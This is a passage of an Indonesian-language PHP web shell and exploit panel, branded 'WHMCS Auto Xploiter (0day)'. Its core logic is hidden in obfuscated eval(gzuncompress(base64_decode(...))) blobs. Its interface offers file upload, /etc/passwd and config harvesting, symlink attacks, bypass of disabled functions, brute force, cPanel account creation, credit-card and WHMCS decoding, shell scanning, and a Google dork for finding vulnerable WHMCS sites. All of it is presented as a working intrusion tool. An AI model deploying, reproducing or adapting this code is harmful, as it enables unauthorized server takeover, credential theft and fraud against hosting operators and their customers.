Bq5ddn9L/XrOPTEQz5+l1ez4RkETPbmPYOed2+0/+jlj17+c3v5i/8yL/+m5Pzoxo9u/JO7cfVkwfZlEwOIPyqifxKHLlH86ISPTvgjTvgDPoh+9mW9o907t3xUR3db8D5KvQYMy6wKX5Y9S51ISddCwN7dcMkKYMTjFA+4xU3k4QmS3tYXk4G4loiKTXp0Z5CBFOgQDhhnO4xO4usSVQPHNjfzw6P8aJvmLmruh6ZOUYJOeKSlLPZp0embAoTYorWVaHIpSzgVs8pHfVcT8yrzgj9SUGsAkZMq0I2EyoUJDCzm8jcdnV753iWtwFuXoOfixE2C0rlxsTN9tAiuEI28fqHmYaJi/vIFBKebWBG+AMSrScWxLh1lKdJKeqJTeXnFQgldHwwPdQWk3jkQ0FYXfZVO/tqgziqVMCSXPEMCLvTEcgRdF8jhlslAUuV7TDRGNH71VCG4mlFQQUrAtCXUYim4cjuLZjHeCiU7a1RJV1jBU5vsfyAckx2qo8svZenhGTie52HUwLeq/xFC3h4P3+wds9qVC2brK7aLh4X4tHUotKqmVGzS3wi8Y3cu4fTGIkktoszNA/+U6gO0vh/VgwXGfYcMcgv/Bn3ghdz7oV52XgC/GxsrYH8pwJ6p3yL8B5V7D3ffpeG78Pzhar5FV+OJwwyKEMt58OsVjyHDjsYn5+/eQF8DgYSSotb7iteoFD10/t6oRDIYuOh+oFiG6EsZgF57yjHQ28sXC5ppVJL1AB3G/w8VMvRubq5LyXTBxixKzMVLNPWasXgFULUgQ4P6zdA19baT3h3I9+3oYvjmjVLFVwSQ5jO6kHdFIV4ujtIX8qlrz78oBLfPXVxG7zJXOvJYfFKF/NQVnp0QrVBRJcUt86dPqof3zOh3m4vBal2Ivwkoz5I994tIfn193Ur8ZCsMPDcQrWsxabl2W74TLK3Cmg2XYY25NCxLOfrpgSQY5mXmdIw7X1SbkhN8DUy8ld6SrXvzW3r/oEaq75NWhDi1VGVRHGwkjvDWd0J4u76NV2ZEMFvqhVaBswjftRZgWL4eEtel3wDgLRuMVac8xbf1WtsJfdG2IltMbtpRNvFcy8QrPu2pVd5XqyK80BEH3dXWfivwLTohhwe2Jx64DbAA/KZX+OvAv73NWF6J1vG98JXGQApCCnStcSywrFhJdaoUmiWipvZbWfTrIrM0md7dHXi1/5YRRrkuD7KfpvtGWh/77se++2fuu20kO79UZVmm+u0n/gaLagf0RfqBHP10iH53swYKffOuuZ6qv0yJhgbriHMxI68es8WdsRy+0SvfVsPzgdev8rsfpatEtdSPTPeqdGtOcdRpljeoYlu+UVYCbEo6iqtudCVtGRHtV8Pf5kHRTYHIUt3utQM5BxZbbKe67ItcBn2/5cT1MLbrivKLmgV6/hejoZx5GsStNjdr6pafUgUguWu/xZVEIlxdw8A5bK/Z3skBg+9/YlXBY+ddUvVCR9geKDkBp2AhS5KoylfVZCSUMpOSmaVdc4YLKa/hNzd7QLj0SxNF4uI+mqrxWT0HMeVvzOp64vAuNvi7DL8Va7bJYEtG9JAqKzW1LC4XfDrihlwJJ5ER1sq/sk3WlXzhd4O9eIg1WXcXVVizJrzwp8mJSOuP5sTHrPiYFf+QrCgr0rtnCxfkto1t3qILyn+i+6zclv77X/Xd7elXJ22kUbILPeG/3bzrLf18l7Glu5SaulWX/6pW0VSBXczfypmcVTl++38=';
  313. eval(gzinflate(base64_decode($rahasia)));
  314. // Script Encoded 1239477
  315. ?>
  316.  
  317.  
  318. <center><b><span class="b1">Cyber</span> <span class="b2">Team</span></b><br>
  319. <div align="center">
  320. <center>
  321. <font face="Audiowide" color="red">WHMCS Auto Xploiter <font color="green">(0day)</font>
  322. <br><br>
  323. <font face="Audiowide" color="red">Admin - Hash - Produk - Email - pasword <br> buat cPanel - Dll <br><br>
  324. <center>
  325. <div align="center">
  326. <table class="tabnet" style="width:830px;padding:0 1px;">
  327. <tr><th><nobr><span class='b7'> Exploit Shell Multi Fungsi</span></nobr>
  328. </th></tr>
  329. </table></div><br>
  330. <table class="tabnet" style="width:830px;padding:0 1px;">
  331. <tr>
  332. <th colspan="2">
  333. <center><blink><a href="?"><b><span class="b1">REGAN</span><span class="b2">X5HELL</span></b></a></blink>
  334. </th>
  335. </tr>
  336. </table>
  337. </div>
  338. <STYLE>
  339. textarea{background-color:#105700;color:lime;font-weight:bold;font-size: 20px;font-family: Tahoma; border: 1px solid #000000;}
  340. input{FONT-WEIGHT:normal;background-color: #105700;font-size: 15px;font-weight:bold;color: lime; font-family: Tahoma; border: 1px solid #666666;height:20}
  341. body {
  342. font-family: Tahoma
  343. }
  344. tr {
  345. BORDER: dashed 1px #333;
  346. color: #FFF;
  347. }
  348. td {
  349. BORDER: dashed 1px #333;
  350. color: #FFF;
  351. }
  352. .table1 {
  353. BORDER: 0px Black;
  354. BACKGROUND-COLOR: Black;
  355. color: #FFF;
  356. }
  357. .td1 {
  358. BORDER: 0px;
  359. BORDER-COLOR: #333333;
  360. font: 7pt Verdana;
  361. color: Green;
  362. }
  363. .tr1 {
  364. BORDER: 0px;
  365. BORDER-COLOR: #333333;
  366. color: #FFF;
  367. }
  368. table {
  369. BORDER: dashed 1px #333;
  370. BORDER-COLOR: #333333;
  371. BACKGROUND-COLOR: Black;
  372. color: #FFF;
  373. }
  374. input {
  375. border : dashed 1px;
  376. border-color : #333;
  377. BACKGROUND-COLOR: Black;
  378. font: 8pt Verdana;
  379. color: Red;
  380. }
  381. select {
  382. BORDER-RIGHT: Black 1px solid;
  383. BORDER-TOP: #DF0000 1px solid;
  384. BORDER-LEFT: #DF0000 1px solid;
  385. BORDER-BOTTOM: Black 1px solid;
  386. BORDER-color: #FFF;
  387. BACKGROUND-COLOR: Black;
  388. font: 8pt Verdana;
  389. color: Red;
  390. }
  391. submit {
  392. BORDER: buttonhighlight 2px outset;
  393. BACKGROUND-COLOR: Black;
  394. width: 30%;
  395. color: #FFF;
  396. }
  397. textarea {
  398. border : dashed 1px #333;
  399. BACKGROUND-COLOR: Black;
  400. font: Fixedsys bold;
  401. color: #999;
  402. }
  403. BODY {
  404. SCROLLBAR-FACE-COLOR: Black; SCROLLBAR-HIGHLIGHT-color: #FFF; SCROLLBAR-SHADOW-color: #FFF; SCROLLBAR-3DLIGHT-color: #FFF; SCROLLBAR-ARROW-COLOR: Black; SCROLLBAR-TRACK-color: #FFF; SCROLLBAR-DARKSHADOW-color: #FFF
  405. margin: 1px;
  406. color: Red;
  407. background-color: Black;
  408. }
  409. .main {
  410. margin : -287px 0px 0px -490px;
  411. BORDER: dashed 1px #333;
  412. BORDER-COLOR: #333333;
  413. }
  414. .tt {
  415. background-color: Black;
  416. }
  417.  
  418. A:link {
  419. COLOR: White; TEXT-DECORATION: none
  420. }
  421. A:visited {
  422. COLOR: White; TEXT-DECORATION: none
  423. }
  424. A:hover {
  425. color: Red; TEXT-DECORATION: none
  426. }
  427. A:active {
  428. color: Red; TEXT-DECORATION: none
  429. }
  430.  
  431. #result{margin:10px;}
  432. #result span{display:block;}
  433. #result .Y{background-color:green;}
  434. #result .X{background-color:blue;}
  435. </STYLE>
  436. <script language=\'javascript\'>
  437. function hide_div(id)
  438. {
  439. document.getElementById(id).style.display = \'none\';
  440. document.cookie=id+\'=0;\';
  441. }
  442. function show_div(id)
  443. {
  444. document.getElementById(id).style.display = \'block\';
  445. document.cookie=id+\'=1;\';
  446. }
  447. function change_divst(id)
  448. {
  449. if (document.getElementById(id).style.display == \'none\')
  450. show_div(id);
  451. else
  452. hide_div(id);
  453. }
  454. </script>
  455. </td></table></tr>
  456. <br>
  457. <br>
  458. <link rel="stylesheet" type="text/css" href="http://fonts.googleapis.com/css?family=Audiowide">
  459. <style>
  460. body {
  461. font-family: 'Audiowide', serif;
  462. font-size: 30px;
  463.  
  464. }
  465. </style>
  466. <style type="text/css">
  467. body{background:#000;}
  468. .areaz {color:red;background:#000;width:400px;height:130px;}
  469. .b1{color:yellow;}
  470. .hulu{background:#000;padding:10px 0 10px 0;}
  471. .sukses{background:green;color:#FFF;padding-top:10px;padding-bottom:10px;}
  472. .gagal{background:red;color:#black;margin:10px;}
  473. .grab a{color:red;display:block;width:100%;}
  474. .grab{background:black;color:red;display:block;width:100%;}
  475. </style>
  476.  
  477. <style type="text/css">
  478. body{background:#000;}
  479. .areaz {color:red;background:#000;width:400px;height:130px;}
  480. .b1{color:yellow;}
  481. .hulu{background:#000;padding:10px 0 10px 0;}
  482. .sukses{background:green;color:#FFF;padding-top:10px;padding-bottom:10px;}
  483. .gagal{background:red;color:#black;margin:10px;}
  484. .grab a{color:red;display:block;width:100%;}
  485. .grab{background:black;color:red;display:block;width:100%;}
  486. </style>
  487. <script language="JavaScript">
  488. function loadPage(list){
  489. location.href=list.options[list.selectedIndex].value}
  490. </script>
  491. </head>
  492. <body><center>
  493. <div class="hulu">
  494. <br>
  495. <script type="text/javascript">
  496. function tukar(lama,baru){
  497. document.getElementById(lama).style.display = 'none';
  498. document.getElementById(baru).style.display = 'block';
  499. }
  500. function blink() {
  501. var blinks = document.getElementsByTagName('kelip');
  502. for (var i = blinks.length - 1; i >= 0; i--) {
  503. var s = blinks[i];
  504. s.style.visibility = (s.style.visibility === 'visible') ? 'hidden' : 'visible';
  505. }
  506. window.setTimeout(blink, 500);
  507. }
  508. if (document.addEventListener) document.addEventListener("DOMContentLoaded", blink, false);
  509. else if (window.addEventListener) window.addEventListener("load", blink, false);
  510. else if (window.attachEvent) window.attachEvent("onload", blink);
  511. else window.onload = blink;
  512. </script>
  513.  
  514. <style type="text/css">
  515. body{ background:#000000; }
  516. a { text-decoration:none; }
  517. a:hover{ border-bottom:1px solid #4C83AF; }
  518.  
  519. #menu{ background:#111111;margin:8px 2px 4px 2px; }
  520.  
  521. #menu a{ padding:4px 18px;
  522. margin:0;
  523. background:#222222;
  524. text-decoration:none;
  525. letter-spacing:2px;
  526. border-radius: 4px;
  527. border-bottom:2px solid #444444;
  528. border-top:2px solid #444444;
  529. border-right:2px solid red;
  530. border-left:2px solid red;
  531. }
  532.  
  533. #menu a:hover{
  534. background:#191919;
  535. border-radius: 7px;
  536. border-bottom:2px solid #white;
  537. border-top:2px solid #white;
  538. border-right:2px solid #FF0000;
  539. border-left:2px solid #FF0000;
  540. }
  541.  
  542. .tabnet{ margin:15px auto 0 auto;border: 1px solid #333333; }
  543.  
  544. .main { width:90%;
  545. background:#000000;
  546. margin:30px auto 10px;
  547. padding:10px 10px 5px 10px;
  548. border-radius:5px;
  549. -moz-border-radius:5px;
  550. -moz-box-shadow:0px 0px 10px #FFFFFF;
  551. }
  552.  
  553. .gaya { color: red; }
  554.  
  555. .gaya a { color: #4C83AF; }
  556.  
  557. .inputz{ background:#111111;
  558. border:0;
  559. padding:2px;
  560. border-bottom:1px solid #FF0000;
  561. border-top:1px solid #FF0000; }
  562.  
  563. .inputzbut{
  564. background:#111111;
  565. color:#FF0000;
  566. margin:0 4px;
  567. border:1px solid #444444;
  568. border-bottom:1px solid #FF0000;
  569. border-top:1px solid #FF0000;
  570. border-right:1px solid #FF0000;
  571. border-left:1px solid #FF0000;
  572. }
  573.  
  574. .inputz:hover, .inputzbut:hover{
  575. border-bottom:1px solid white;
  576. border-top:1px solid white;
  577. }
  578.  
  579. .output { margin:auto;
  580. border:1px solid #FF0000;
  581. width:100%;
  582. height:400px;
  583. background:#000000;
  584. padding:0 2px; }
  585.  
  586. .cmdbox{ width:100%; }
  587.  
  588. .head_info{ padding: 0 4px; }
  589.  
  590. .dminfox {
  591. font-size:11px;
  592. font-family:Tahoma,Verdana,Arial;
  593. color:white;
  594. }
  595.  
  596. .infodmx {
  597. font-size:11px;
  598. font-family:Tahoma,Verdana,Arial;
  599. color:lime;
  600. }
  601.  
  602. .b1{
  603. font-size:30px;padding:0;color:red;
  604. }
  605. .b2{
  606. font-size:30px;padding:0;color:white;
  607. }
  608. .b3{
  609. font-size:10px;padding:0;color:red;
  610. }
  611. .b4{
  612. font-size:20px;padding:0;color:#FF0000;
  613. }
  614. .b5{
  615. font-size:20px;padding:0;color:#FFFFFF;
  616. }
  617. .b6{
  618. font-size:20px;padding:0;color:#00FF00;
  619. }
  620. .b7{
  621. font-size:20px;padding:0;color:red;
  622. }
  623. .b8{
  624. font-size:20px;padding:0;color:white;
  625. }
  626. .b9{
  627. font-size:20px;padding:0;color:yellow;
  628. }
  629. .b10{
  630. font-size:20px;padding:0;color:#444444;
  631. }
  632. .b11{
  633. font-size:10px;padding:0;color:lime;
  634. }
  635.  
  636. .b_tbl{ text-align:center;
  637. margin:0 1px 0 0;
  638. padding:0 1px 0 0;
  639. border-right:1px solid #333333; }
  640.  
  641. .c_tbl{ text-align:center;
  642. margin:0 4px 0 0;
  643. padding:0 4px 0 0;
  644. border-left:1px solid #333333; }
  645.  
  646. .phpinfo table{ width:100%;
  647. padding:0 0 0 0; }
  648.  
  649. .phpinfo td{ background:#111111;
  650. color:#cccccc;
  651. padding:6px 8px;; }
  652.  
  653. .phpinfo th, th{ background:#191919;
  654. border-bottom:1px solid #333333;
  655. font-weight:normal; }
  656.  
  657. .phpinfo h2, .phpinfo h2 a{ text-align:center;
  658. font-size:16px;
  659. padding:0;
  660. margin:30px 0 0 0;
  661. background:#222222;
  662. padding:4px 0; }
  663.  
  664. .explore{ width:100%; }
  665.  
  666. .explore a { text-decoration:none; }
  667. .explore td{ border-bottom:1px solid #A9A9A9;
  668. padding:0 8px;
  669. line-height:10px; }
  670.  
  671. .explore th{ padding:3px 8px;
  672. font-weight:normal; }
  673.  
  674. .explore th:hover , .phpinfo th:hover{ border-bottom:1px solid #00FF00; }
  675.  
  676. .explore tr:hover{ background:#A9A9A9;
  677. cursor:pointer; }
  678.  
  679. .viewfile{ background:#EDECEB;
  680. color:#000000;
  681. margin:4px 2px;
  682. padding:8px; }
  683.  
  684. .sembunyi{ display:none;
  685. padding:0;margin:0;}
  686.  
  687. .info{ background:#111111;
  688. width:99%;
  689. padding:5px;
  690. margin:10px auto 5px;
  691. text-align:center;
  692. font-size:13px;}
  693.  
  694. .info a{ font-size:14px;}
  695. .info span{ font-size:14px;}
  696. .jaya{ margin:5px; text-align:right; }
  697. </style>
  698. </head>
  699. <body onLoad="document.getElementById('cmd').focus();">
  700. <div class="main"><div class="head_info">
  701. <table><tr><td>
  702. <table class="b_tbl">
  703. </table>
  704. </td>
  705. <td><?php echo $buff; ?></td>
  706. </tr></table></div>
  707.  
  708. </table>
  709. <b><a href="?<?php echo "rd=" . $pwd; ?>">HOME</a></b>
  710. <b><a href="?<?php echo "rd=" . $pwd; ?>&amp;x=basedir">Basedir</a></b>
  711. <b><a href="?<?php echo "rd=" . $pwd; ?>&amp;x=process">ByPass</a></b>
  712. <b><a href="?<?php echo "rd=" . $pwd; ?>&amp;x=htacs">htaccess</a></b>
  713. <b><a href="?<?php echo "rd=" . $pwd; ?>&amp;x=cc">Credit Card</a></b>
  714. <b><a href="?<?php echo "rd=" . $pwd; ?>&amp;x=analyzer">Analyzer</a></b>
  715. <b><a href="?<?php echo "rd=" . $pwd; ?>&amp;x=whmtools">WHM Tools</a></b>
  716. <b><a href="?<?php echo "rd=" . $pwd; ?>&amp;x=lite">LiteSpeed</a></b>
  717. <b><a href="?<?php echo "rd=" . $pwd; ?>&amp;x=403">403</a></b>
  718. <b><a href="?<?php echo "rd=" . $pwd; ?>&amp;x=whois">Whois</a></b>
  719. <b><a href="?<?php echo "rd=" . $pwd; ?>&amp;x=unzip">Unzip</a></b>
  720. <b><a href="?<?php echo "rd=" . $pwd; ?>&amp;x=coding">Encode & Decode</a></b>
  721. <b><a href="?<?php echo "rd=" . $pwd; ?>&amp;x=cp3">cPanel</a></b>
  722. <b><a href="?<?php echo "rd=" . $pwd; ?>&amp;x=sscan">SHELL SCAN</a></b>
  723. <b><a href="?<?php echo "rd=" . $pwd; ?>&amp;x=gdork">GOOGLE DORK</a></b>
  724. <br>
  725. <br />
  726. <title>Exploit multifungsi by: regan</title>
  727. <form action="?rd=<?php echo $pwd; ?>&amp;x=upload" enctype="multipart/form-data" method="post">
  728. <table class="tabnet" style="width:320px;padding:0 1px;">
  729. <tr><th colspan="2">UPLOAD FILE</th></tr>
  730. <tr><td colspan="2"><p style="text-align:center;"><input style="color:red" type="file" name="file" /></td></tr>
  731. <tr><td colspan="2">
  732. <input type="text" class="inputz" style="width:99%;" name="path" value="<?php echo $pwd; ?>" /><input type="submit" name="uploadcomp" class="inputzbut" value="Upload !" style="width:100px;"></p></td></tr>
  733. </table>
  734. </form>
  735. <center><form method="POST">
  736. <td width="50%"><center><select size=\"1\" name="plugin"><option value="plugin">/etc/passwd</option></option></select></td>
  737. <td width="100%" colspan="2">
  738. <p align="center"><a href="?plugin=plugin"><b><font face="Audiowide" color="lime"></b>CREATE CONFIG</font></b></a></td>
  739. </form><br>
  740. <center>
  741. <form action="?rd=<?php echo $pwd; ?>&amp;x=config" method="post">
  742. <center><br/><br/><nobr><span class="b7"><b> CONFIG</b></span></nobr><br/><br/><form method="POST">
  743. <textarea method='POST' rows=2 cols=20& name="passwd" ><?php
  744. eval(gzuncompress(base64_decode('eJydkkFqwzAQRfeB3OHXGCKRgrzqok66K71Ad20xwpnYIq4lxpM6IeTulU0OYPtvNDCa9/8IEbPngil4FtdWKtP5egV3hEqLj/fPr01ozpVrNz/Q61XsTNfRs0rP7rDP8uHYvWRRY7nd6lu8YExpBYakNMF2XX+Yjk8tW+wRfOcuRUUS+ogd3cb4MzVs+0S/Qa5qAGuN23wI0NeuIajGdRJf70TXZ6R/ttExKNmyfrAXoYHArhUkA/A1WbAjcF8y9LD9bpd4znC8T/pcVNYeyc4IXcQy2bck/wceFIHT')));
  745. ?>
  746. <br><center><input name="cat" size="80" value="HAJAR CONFIG" type="submit"><br/>
  747. </form>
  748. <?php
  749. eval(gzuncompress(base64_decode('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')));
  750. ?>
  751. <table border=1 bordercolor=red>
  752. <tr>
  753. <td width="700">
  754. <br />
  755. <center>
  756. <form method="post">
  757. <b>Google Dork</b>: &nbsp;&nbsp; <br>
  758. <input type="text" id="auto" size="30" name="auto" value="<?php echo (isset($_POST['auto']{0})) ? htmlentities($_POST['auto']) : 'inurl:submitticket.php site:'; ?>" /><br>
  759. <input type="submit" value="Cari!" id="button"/>
  760. </form>
  761. </center>
  762. </div>
  763. <style type="text/css">
  764. body{background:#000;}
  765. .areaz {color:red;background:#000;width:400px;height:130px;}
  766. .b1{color:yellow;}
  767. .hulu{background:#000;padding:10px 0 10px 0;}
  768. .sukses{background:green;color:#FFF;padding-top:10px;padding-bottom:10px;}
  769. .gagal{background:red;color:#black;margin:10px;}
  770. .grab a{color:red;display:block;width:100%;}
  771. .grab{background:black;color:red;display:block;width:100%;}
  772. </style>
  773. <script language="JavaScript">
  774. function loadPage(list){
  775. location.href=list.options[list.selectedIndex].value}
  776. </script>
  777. <body><center>
  778. <div class="hulu">
  779. <br>
  780. <form method="get" action="">
  781. <font color="blue" size="4"><b>MASUKKAN URL VULN</b></font>
  782. <center>
  783. <input type="text" id="dork" size="30" name="dork" value="<?php echo (addhttp(isset($_GET['dork']{0}))) ? addhttp(htmlentities($_GET['dork'])) : 'http://'; ?>"/><br>
  784. <input type="submit" value="Go!" id="button"/>
  785. </form><br>
  786. <body onLoad="type_text()" ; bgColor=#000000 text=#00FFFF background="Fashion fuchsia">
  787. <center>
  788. <table border=1 bordercolor=red>
  789. <tr>
  790. <td width="700">
  791. <br />
  792. <center>
  793. <font face="Audiowide" color="lime"><b>PASSWORD MD5</b></font>
  794. <form method="post" name="pageform"
  795. action="" onsubmit="return validate(this);">
  796. <textarea rows="1" cols="30" name="regan"/></textarea>
  797. <br/><br/>
  798. <nobr>
  799. <input name="decr" type="submit" value=" Decrypt MD5 " id="button"/>
  800. <input name="encr" type="submit" value=" Encrypt MD5 " id="button"/>
  801. <body onLoad="type_text()" ; bgColor=#000000 text=#00FFFF background="Fashion fuchsia">
  802. <center>
  803. <table border=1 bordercolor=red>
  804. <tr>
  805. <td width="700">
  806. <br />
  807. <center>
  808. <font face="Audiowide" color="red"><b>Shell</b></font>
  809. <br/><br/>
  810. <input name="jump" type="submit" value=" JUMPING " id="button">
  811. <input name="brute" type="submit" value=" BruteForce " id="button">
  812. <input name="auconf" type="submit" value=" Auto Config " id="button">
  813. <input name="sym" type="submit" value=" Symlink " id="button">
  814. <input name="sym1" type="submit" value=" Symlink A " id="button">
  815. <input name="sym2" type="submit" value=" Symlink B " id="button">
  816. <input name="sym3" type="submit" value=" Symlink C " id="button">
  817. <input name="sym4" type="submit" value=" Symlink D " id="button">
  818. <input name="sym5" type="submit" value=" Symlink E " id="button">
  819. <input name="sym6" type="submit" value=" Symlink F " id="button">
  820. <input name="disable" type="submit" value=" Disabled Functions " id="button">
  821. <input name="kill" type="submit" value=" Kill Me " id="button">
  822. <body onLoad="type_text()" ; bgColor=#000000 text=#00FFFF background="Fashion fuchsia">
  823. <center>
  824. <table border=1 bordercolor=red>
  825. <tr>
  826. <td width="700">
  827. <br />
  828. <center>
  829. <font face="Audiowide" color="lime"><b>Lain - lain</b></font>
  830. <br/><br/>
  831. <input name="cpanel" type="submit" value=" Buat cPanel " id="button"/>
  832. <input name="WHMCS" type="submit" value=" WHMCS DECODER " id="button"/><br>
  833. <input name="aut" type="submit" value=" author " id="button">
  834. <input name="thank" type="submit" value=" Thank's " id="button">
  835. <input name="sms" type="submit" value=" KIRIM SMS " id="button"><br>
  836. </nobr>
  837. </table>
  838. </div>
  839. <!-- waket -->
  840. <?php
  841. eval(gzuncompress(base64_decode('eJy9V9Fu2jAUfa/Uf7AipASpbVrtAWkD1Ja2G1tLq6VTH7oqcpIL8XDizHYKaNq+fdcJULp1pYMSgSD29TnH9/rYGAXa1ywBn7OEaWe//m57i/UdphRop+ZfXXrXtzbNQ5H27bt6/cf21qECpZhIfaWp1I4BYNefLAR7QUohfQmZkJqlg5L8kKXMN+Q2FwO/GKLsnSliHiuhOMLe6X05P38MTOjYhzGEuTbTMLoFwfYWhLEgdtMNZLv8CCHVgN9Bm3idox7pXPbOuu+Jd3p+6h11STOQbtt+AJpmk5JYQr9lmZTZwCKY5QB0y/IDTtOh1W61Sef0Eznpet0eUrSaLkW1uRJSbG89bhsF8zpMhhGTjl0y45wbjUZZvknCWTp0LNfameq6UghtmWhtyJKQcdIi1mVmMlaEco7VOmESQi3kpJtGMCZePt6LdWIiR1F0PcmAaBhrN+OUpWQvi7My8oGmEQdJFMh7kLsZlQqihfhfyAfSGVSP9bz7M3zPcSKkJ1LApkc1U/0JOUonFk6+zzj4Wa59zEpjSZQzyw/xNAzRStbONMMiWZoERa4FEOu+AHRBh25GlRpFZWFiqoqxMM64iMCxvqZIVjCYeF9IoGHsTMdRRWqBSAdDKo2Na8gWLoLfInYWN5Z4yry1MJcSZ+PjOiI2E4qNzSzDUVRshFrZP+fE9VyE1AsjzFbbdu09A7g9uNsrns2MbvenDRN4Y55H2W5ZMrNE9twf1sL43ZurImj4/5M9wD22YYlRtmEBxTRsWGIp9VWcHR+vys7SkOcRqOUy98c554CGXC+RXFJzkjwj9FGIhNOVlxyCipS+FegnxTqvLlYYrZq8DKM/4CKg/BmN7tU6nltut4vJ6qb2QJuDUz1D712crbMUyo2gT3OuXbVc60Tm2bSWK8jBwX7DX1ouM2pVhYhq+oIDwIOIofFe6aTJJfxb65dQHZEkIENY2cWc4U/fi7fMzYeLjree1kJqG1VTeWZuBpWKVZXbKE7CiqQikeAdsxqtWChzSFRXw2qU8LbLK0vL2JDyarSEjEBWeXZQ/L9Qpe1X3WM/8f0b/47XQg==')));
  842. ?><?php
  843. eval(gzuncompress(base64_decode('eJxtjsEKwjAMQO+D/UMpg7YgmxdPdvsFBb05GbXLbGFrR9uDIP670aknIckheXlJhNQlO0E32skmvhbbPLMDtzFC4kW33x2OJwZOB3YWgtxJnhVGRUNqArd59D1w2obW0dWXDXBVDmH0DD6A0oYvGyqSYlYxfixTv0EJVr50kQdtPKHS+Uto5OBdItqPPtQMfwPW0PJNllRWr2GD6/8plP4gWS06TIonHhhP5VdKJw==')));
  844. ?><?php
  845. eval(gzuncompress(base64_decode('eJzNVl1PIjEUfTfxPzSNWTABZlgVAYfZbFZ92lWD+LBBQ8rMhWks7dgWUTf73/d2GATdJeCG/XhgSMvtuafnnLnBgO1ZPoKe4CNui/7u0fYWHxS5MWCLO72L88tOtxBDpAs3u7vkG9ne2kmYSUiLwEMqVAxFeq2vJS3NajUMmcRixBkoDSxKitMTzJCdUXwwBYEoUYQGJmWSRIIZ0/oaBn0dBlLhk1ZcZYUGXrYMZh/P1Yf0yLGImWXIIhpr0eMSqbuO2QqZqxTJu4oS+XTV/nx+0em1TzpX7bNO++PZ5elJu0SqK+rxq0RoYm3a9LzJZFJBRmV3kUqkRt5sweWw7NR5TK3nOFOH6u7LxYwcPEA0BX/uGAllYL6HegPKxov0eAoFMbHwYAkKSL4cHxDXCRXOYJ0L2KIvmF4woRAYq5Uc5mJSDWYsLA0LJZIfO8oOqZeHvOkpVDbNSh1qt5qZlzs0FrknryUgrTAYKGlJpBC1hfGBkKBxrkfXv3HmuZ/DmYceIlHE/U5AGHB3eGMHDXFIzpQlp2os42XofzsZSDjSLLoFneXi7jZjnybpBzzJlWylgnHp3HyXOmc2EJILh0g6CNlcEYqFylVB6Kv4EWVM7EismYSFa/+xLCzv8X+mIaetUfa+mmSJ2IDhUhEN96BRKnxfceSQCQ7Tgbv4ywAsUXGBzm+p+OzSz1PHS6qrZkyKpB8FtKgDLxv+BM31Arac9voB+wfjoPIkGdiK0kO32oT/Phz26/uNxn7dP/Rr8aDODqBRrfqNWo299xF+nRDMaW06A8neLyLwMiR7a86UpSTfMFJy8MK